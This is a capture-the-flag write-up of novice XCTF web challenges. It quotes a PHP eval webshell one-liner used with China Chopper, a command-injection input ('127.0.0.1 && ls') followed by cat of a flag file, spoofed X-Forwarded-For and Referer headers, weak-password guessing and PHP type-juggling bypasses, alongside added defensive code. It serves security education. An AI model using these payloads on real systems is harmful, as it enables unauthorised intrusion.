XCTF Attack & Defense World, Web novice practice area -- write-up

view source

Challenge description: Teacher X told the students to view a page's source code, but Xiaoning found that the right mouse button does not work.

After opening the challenge the page shows "FLAG is not here", and the description says the right mouse button is disabled. So press F12 to open the developer tools; the Inspector shows the page source directly, and the flag is in the source.

get post

Challenge description: Teacher X told the students about the two HTTP request methods that are most often used. Do you know which two?

Opening the challenge, the page says "Please submit a variable named a with value 1 using the GET method". GET parameters are usually appended to the URL as a query string; that is the only way GET passes parameters. So append ?a=1 to http://111.198.29.45:39706/, i.e. request http://111.198.29.45:39706/?a=1. The output then shows the second prompt:
after the GET parameter is accepted it asks "Please submit a variable named b with value 2 using POST". Send the POST request with the Firefox extension HackBar,
and the page outputs cyberpeace{xxxxxxxxxxxxxxxxxxxxxxxxx}.
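To show what the server side of this challenge has to do, here is an added example (not code from the original write-up or the challenge) of a minimal WSGI handler that reads a from the query string and b only from a POST body. The flag value is a constructed placeholder, and the prompt texts are assumed to mirror the challenge.

```python
# Added example (not part of the original write-up): a minimal WSGI handler that
# distinguishes the GET query-string parameter a=1 from the POST form-body
# parameter b=2, as the challenge asks. FLAG is a constructed placeholder.
import io
from urllib.parse import parse_qs

FLAG = "cyberpeace{PLACEHOLDER_FLAG}"  # constructed placeholder, not the real flag


def get_params(environ):
    """Parameters sent in the URL query string (the GET way)."""
    return parse_qs(environ.get("QUERY_STRING", ""))


def post_params(environ):
    """Parameters sent in the request body (the POST way); read only for POST."""
    if environ.get("REQUEST_METHOD") != "POST":
        return {}
    length = int(environ.get("CONTENT_LENGTH") or 0)
    body = environ["wsgi.input"].read(length).decode()
    return parse_qs(body)


def challenge(environ):
    """Returns the page text for one request, mirroring the challenge prompts."""
    a = get_params(environ).get("a", [None])[0]
    b = post_params(environ).get("b", [None])[0]
    if a != "1":
        return "Please submit a variable named a with value 1 using GET"
    if b != "2":
        # b=2 placed in the query string does not count: it never reaches post_params()
        return "Please submit a variable named b with value 2 using POST"
    return FLAG


def make_environ(method, query="", body=""):
    """Builds a WSGI environ for a constructed request (helper for trying it offline)."""
    raw = body.encode()
    return {
        "REQUEST_METHOD": method,
        "QUERY_STRING": query,
        "CONTENT_LENGTH": str(len(raw)),
        "wsgi.input": io.BytesIO(raw),
    }


if __name__ == "__main__":
    print(challenge(make_environ("GET", "a=1")))
    print(challenge(make_environ("POST", "a=1", "b=2")))
```

Note that a POST request to ?a=1&b=2 with an empty body still gets the "use POST" prompt: the server looks for b in the body, which is exactly why HackBar's POST option is needed rather than another URL edit.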

robots

Challenge description: Teacher X talked about the Robots protocol in class, but Xiaoning fell asleep. Quickly teach Xiaoning what the Robots protocol is.

First, let's learn about the Robots protocol.

The Robots protocol (also called the crawler protocol; its full name is the Robots Exclusion Protocol) is how a site tells search engines which pages may be crawled and which may not.
It is usually implemented through a robots.txt file: a plain text file, and a convention rather than an enforced command. robots.txt is the first file a search engine fetches when it visits a site; it tells the spider which files on the server may be viewed.

How robots.txt is written:

User-agent: *              applies to all search engines; * is a wildcard
Disallow: /admin/          forbids crawling the admin directory
Disallow: /require/        forbids crawling the require directory
Disallow: /ABC/            forbids crawling the ABC directory
Disallow: /cgi-bin/*.htm   forbids every URL under /cgi-bin/ with the ".htm" suffix (including subdirectories)
Disallow: /*?*             blocks every URL on the site containing a question mark (?)
Disallow: /*.jpg$          blocks all .jpg images on the site
Disallow: /ab/adc.html     forbids crawling the file adc.html in the ab folder
Allow: /cgi-bin/           allows crawling the cgi-bin directory
Allow: /tmp                allows crawling the entire tmp directory
Allow: /*.htm$             allows only URLs with the ".htm" suffix
Allow: /*.gif$             allows crawling gif images
Sitemap: <url>             tells crawlers where the site map is

Now that we know the Robots protocol, let's look at the challenge.

Append /robots.txt to the challenge URL, i.e. http://111.198.29.45:49905/robots.txt. It shows that
f1ag_1s_h3re.php is disallowed for crawling, so open the f1ag_1s_h3re.php page to get the flag.
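The challenge works because robots.txt is advertised to every client, crawler or not, so a Disallow line is a map of what the owner wanted hidden. As an added example (not code from the original post), the matcher below implements the Disallow/Allow rules listed above, including the "*" wildcard and the "$" end anchor, on a robots.txt text constructed for the example; the precedence rule (longest matching pattern wins, Allow wins ties) is the one most large crawlers use and is an assumption here, not something the post states.

```python
# Added example (not from the original post): a small robots.txt matcher for the
# User-agent: * group, supporting '*' wildcards and the '$' end anchor.
import re

# Constructed robots.txt for the example, using the rule forms listed above.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /cgi-bin/*.htm
Disallow: /*?*
Disallow: /*.jpg$
Disallow: /f1ag_1s_h3re.php
Allow: /cgi-bin/
Allow: /*.gif$
"""


def parse_robots(text):
    """Returns a list of (allow: bool, pattern: str) rules that apply to User-agent: *."""
    rules, applies = [], False
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            applies = value == "*"                 # only the wildcard group is kept
        elif applies and field in ("allow", "disallow") and value:
            rules.append((field == "allow", value))
    return rules


def _matches(pattern, path):
    """robots.txt pattern semantics: prefix match, '*' matches anything, '$' anchors the end."""
    anchored = pattern.endswith("$")
    if anchored:
        pattern = pattern[:-1]
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.match(regex + ("$" if anchored else ""), path) is not None


def is_allowed(rules, path):
    """Longest matching pattern wins; Allow wins ties; no match means allowed."""
    best = None
    for allow, pattern in rules:
        if _matches(pattern, path):
            longer = best is None or len(pattern) > len(best[1])
            tie = best is not None and len(pattern) == len(best[1]) and allow
            if longer or tie:
                best = (allow, pattern)
    return True if best is None else best[0]


def hidden_paths(text):
    """Every Disallow entry is a path the site owner chose to publish to all clients."""
    return [pattern for allow, pattern in parse_robots(text) if not allow]


if __name__ == "__main__":
    rules = parse_robots(SAMPLE_ROBOTS)
    for p in ("/index.php", "/admin/", "/cgi-bin/a.htm", "/cgi-bin/a.gif", "/f1ag_1s_h3re.php"):
        print(p, "allowed" if is_allowed(rules, p) else "disallowed")
    print("advertised as hidden:", hidden_paths(SAMPLE_ROBOTS))
```

hidden_paths() is the defender's view of the file: anything that must stay private belongs behind authentication, not in a Disallow line.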

backup

Challenge description: Teacher X forgot to delete a backup file and sent Xiaoning to find it. Let's help Xiaoning!

After opening, the page says "Do you know the backup file of index.php?". A backup file is usually the file name plus .bak, so request index.php.bak; the browser prompts to download it.
Open the downloaded file with Notepad++ to get the flag.

cookie

Challenge description: Teacher X told Xiaoning that he put something in a cookie. Xiaoning wondered: does that mean a biscuit?

Opening the challenge shows "Do you know what a cookie is?"
Using the F12 developer tools, Network tab, look at the response headers and find "Cookie: look-here=cookie.php".
Following the hint, append /cookie.php to the URL, i.e. http://111.198.29.45:47420/cookie.php, and view the response headers of that request in the Network tab to get the flag.

disabled_button

Challenge description: Teacher X taught front-end knowledge today and then gave us a button that cannot be pressed. Xiaoning is surprised: how do you press a button that won't press?

Open the challenge as shown in the figure.
View the page source with the F12 developer tools: the button carries a disabled="" attribute. Delete that attribute and the button works normally.
Click the flag button to get the flag.

simple js

Challenge description: Xiaoning found a web page but has no password for it. (Flag format: Cyberpeace{xxxxxxxxx})

Open the challenge: there is an "Enter password" box. Just enter "123".
Entering "123" gives a wrong-password result.
Open the developer tools (F12) and view the page source.
Copy out the JS code and analyze it:

    function dechiffre(pass_enc) {
        // hard-coded ASCII codes: decodes to "FAUX PASSWORD HAHA"
        var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";
        var tab  = pass_enc.split(',');   // the user input: split, but never used for the result
        var tab2 = pass.split(',');
        var i, j, k, l = 0, m, n, o, p = "";
        i = 0;
        j = tab.length;
        k = j + (l) + (n = 0);
        n = tab2.length;
        // first loop: characters 0..5 of pass
        for (i = (o = 0); i < (k = j = n); i++) {
            o = tab[i - l];
            p += String.fromCharCode((o = tab2[i]));
            if (i == 5) break;
        }
        // second loop: characters 6..n-2 of pass
        for (i = (o = 0); i < (k = j = n); i++) {
            o = tab[i - l];
            if (i > 5 && i < k - 1)
                p += String.fromCharCode((o = tab2[i]));
        }
        p += String.fromCharCode(tab2[17]);   // the last character of pass
        pass = p;
        return pass;
    }
    // the interesting part: a \x-escaped string passed in as the argument
    String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));

    h = window.prompt('Enter password');
    alert(dechiffre(h));

Notice the argument \x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30. Replacing \x with % turns it into a URL-encoded string, %35%35%2c%35%36%2c%35%34%2c%37%39%2c%31%31%35%2c%36%39%2c%31%31%34%2c%31%31%36%2c%31%30%37%2c%34%39%2c%35%30,
which URL-decodes to: 55,56,54,79,115,69,114,116,107,49,50
Converting these ASCII codes to characters gives the string: 786OsErtk12
The flag format is Cyberpeace{xxxxxxxxx}, so submit Cyberpeace{786OsErtk12} to get the flag.
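Why does the typed password never matter? As an added example (not code from the original post), the Python port below follows the page's dechiffre() step by step: the input is split into tab and then never used, so every call returns the same decoy string, and the only secret on the page is the \x-escaped argument. Python reads \xNN escapes the same way JavaScript does, so the same literal can be decoded directly.

```python
# Added example (not from the original post): a faithful Python port of the
# page's dechiffre() plus the decoding of its hard-coded argument.

DECOY_CODES = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"
# The escaped literal from the page; \xNN escapes mean the same in Python and JS.
ENCODED_ARG = ("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c"
               "\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30")


def dechiffre(pass_enc):
    """Port of the page's function: the input is split but never used for the output."""
    tab = pass_enc.split(",")          # read and ignored, exactly as in the original
    tab2 = DECOY_CODES.split(",")
    n = len(tab2)
    p = ""
    for i in range(n):                 # first loop: characters 0..5, then break
        p += chr(int(tab2[i]))
        if i == 5:
            break
    for i in range(n):                 # second loop: characters 6..n-2
        if 5 < i < n - 1:
            p += chr(int(tab2[i]))
    p += chr(int(tab2[17]))            # the last character, appended explicitly
    return p


def decode_hidden_password(escaped):
    """'55,56,54,...' -> '786OsErtk12': comma-separated ASCII codes to text."""
    return "".join(chr(int(code)) for code in escaped.split(","))


def flag(escaped):
    """Wraps the decoded password in the flag format stated by the challenge."""
    return "Cyberpeace{" + decode_hidden_password(escaped) + "}"


if __name__ == "__main__":
    print(dechiffre("123"))                        # FAUX PASSWORD HAHA, whatever you type
    print(ENCODED_ARG)                             # 55,56,54,79,115,69,114,116,107,49,50
    print(flag(ENCODED_ARG))                       # Cyberpeace{786OsErtk12}
```

The lesson for anyone writing a login page is the mirror image: client-side JavaScript is fully readable by the user, so a password check (and the password itself) must live on the server.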

xff referer

Challenge description: Teacher X told Xiaoning that XFF and Referer can in fact be forged.

Open the challenge; it says the IP address must be 123.123.123.123.
Use the X-Forwarded-For Header browser extension to change the IP address the server sees.
After changing the IP, the page says "must come from https://www.google.com". Here use Burp to capture and modify the request (Burp usage is not covered in this write-up).
Send the captured request to the Repeater module, add the request header "Referer: https://www.google.com", click Go, and the Response contains the flag.
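The challenge shows the failure mode from the attacker's seat; the defender's version of the same point is that X-Forwarded-For and Referer are request headers, written by whoever sends the request, so a server must not treat them as identity. As an added example (not code from the original post), the function below contrasts the naive check the challenge implements with the usual safe derivation: start from the TCP peer address and walk the X-Forwarded-For chain from the right only through proxies the server itself trusts. The trusted proxy address and the client addresses are constructed for the example.

```python
# Added example (not from the original post): deriving the client address
# safely instead of believing X-Forwarded-For as sent.
import ipaddress

# Constructed for the example: the address of our own reverse proxy.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def naive_client_ip(headers, peer):
    """What the challenge does: believes the left-most XFF entry (client-controlled)."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer


def client_ip(headers, peer):
    """Walk the XFF chain from the right, stepping left only through trusted proxies.

    Each proxy appends the address it saw, so the right-most entries are the
    trustworthy ones; anything the client pre-filled sits on the left and is
    never reached unless one of our own proxies vouched for it."""
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    current = ipaddress.ip_address(peer)
    while current in TRUSTED_PROXIES and hops:
        try:
            current = ipaddress.ip_address(hops.pop())
        except ValueError:
            break  # malformed entry written by a trusted proxy: stop at the last good hop
    return str(current)


def is_from_expected(headers, peer, expected="123.123.123.123"):
    """The challenge's rule, evaluated on the derived address rather than the raw header."""
    return client_ip(headers, peer) == expected


if __name__ == "__main__":
    forged = {"X-Forwarded-For": "123.123.123.123"}
    print("naive:", naive_client_ip(forged, "203.0.113.9"))   # 123.123.123.123 (forged)
    print("safe: ", client_ip(forged, "203.0.113.9"))         # 203.0.113.9 (the real peer)
```

The Referer header has no equivalent safe derivation at all: it is advisory, and a server that wants to know where a request came from needs a token it issued itself (a CSRF token or session binding), not a header the client fills in.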

weak auth

Challenge description: Xiaoning wrote a login authentication page and set a password by hand.

Open the challenge; there is a login box.
This challenge is weak auth (weak authentication), i.e. a test of weak passwords: enter admin / 123456 to get the flag (honestly, a lucky guess).

webshell

Challenge description: Xiaoning searched Baidu for a PHP one-liner, found it interesting, and put it in index.php.

Open the challenge; it shows "webshell would you use it? <?php @eval($_POST['shell']);?>".
This is the PHP one-line trojan, and the description says it is in index.php. Connect to it with China Chopper (菜刀).
After connecting, the file flag.txt is visible.
Read flag.txt to get the flag.

command execution

Challenge description: Xiaoning wrote a ping function but no WAF. Teacher X told her it is very dangerous. Do you know why?

Open the challenge and see the ping function.
First, some Windows and Linux command-chaining knowledge:
command1 && command2    execute command1, then execute command2 (only if command1 succeeded)
command1 | command2     only command2's output is shown (command1's output is piped into command2)
command1 & command2     command1 runs in the background and command2 runs at once, so command2's output typically appears first

So enter "127.0.0.1 && ls" into the ping address field; the command runs successfully,
locate the file that stores the flag,
and read flag.txt with the cat command.
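The reason it is dangerous is that the ping function splices the user's string into a shell command line, so the shell parses the && and runs ls as a second command. As an added example (not code from the original challenge, whose backend is not shown), the snippet below puts the vulnerable pattern beside the hardened one: validate the target as an IP literal and pass it as its own argv element with no shell, so chaining characters are never interpreted. The ping -c 1 flags assume a Linux ping.

```python
# Added example (not from the original post): the ping function with and
# without input validation. The vulnerable version builds a shell string; the
# hardened one validates the target and never starts a shell.
import ipaddress
import subprocess


def build_shell_command(target):
    """Vulnerable pattern: the user string becomes part of a shell command line,
    so "127.0.0.1 && ls" makes the shell run ls after ping."""
    return "ping -c 1 " + target


def validate_target(target):
    """Accept only an IPv4/IPv6 literal; anything else (including shell
    metacharacters and hostnames) is rejected before any process is started."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError("invalid target: %r" % target) from None


def is_valid_target(target):
    """Boolean form of validate_target(), convenient for request handlers."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def safe_ping_argv(target):
    """argv for subprocess.run(shell=False): no shell, so && | & ; are just bytes
    inside one argument, and validate_target() rejects them anyway."""
    return ["ping", "-c", "1", validate_target(target)]


def ping(target):
    """Runs the hardened ping and returns (returncode, stdout)."""
    result = subprocess.run(safe_ping_argv(target), capture_output=True, text=True, timeout=5)
    return result.returncode, result.stdout


if __name__ == "__main__":
    print(build_shell_command("127.0.0.1 && ls"))    # ping -c 1 127.0.0.1 && ls
    print(is_valid_target("127.0.0.1 && ls"))        # False
    print(safe_ping_argv("127.0.0.1"))               # ['ping', '-c', '1', '127.0.0.1']
```

A WAF that blocklists && and | is the weaker fix: the allowlist above rejects every string that is not an address, including ones using separators a blocklist forgot.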

simple php

Challenge description: Xiaoning heard that PHP is the best language, so after learning it she wrote a few lines of PHP and found it simple.

Open the challenge to see the source code.
Source code analysis:

<?php
show_source(__FILE__);
include("config.php");
// $_GET collects values submitted by a GET-method form and is visible to anyone; @ suppresses error output
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){
	echo $flag1;
}
// is_numeric(): returns TRUE if the variable is a number or a numeric string, otherwise FALSE
if(is_numeric($b)){
    exit();
}
if($b>1234){
    echo $flag2;
}
?>

First half, FLAG1: request http://10.10.10.175:32779/index.php?a=a.
PHP's loose comparison (==) between the non-numeric string "a" and the integer 0 casts the string to 0, so $a==0 is true, while $a itself is a non-empty string and therefore truthy, and flag1 is printed. (This relies on pre-PHP 8 semantics; PHP 8 compares 0 with "a" as strings and the check fails.)
Second half, FLAG2: request http://10.10.10.175:32779/index.php?a=a&b=1235b.
is_numeric("1235b") is false, so exit() is skipped, and in the comparison $b>1234 the leading digits 1235 are what gets compared, so it is greater than 1234 and flag2 is printed.


Origin blog.csdn.net/qq_43081170/article/details/94717446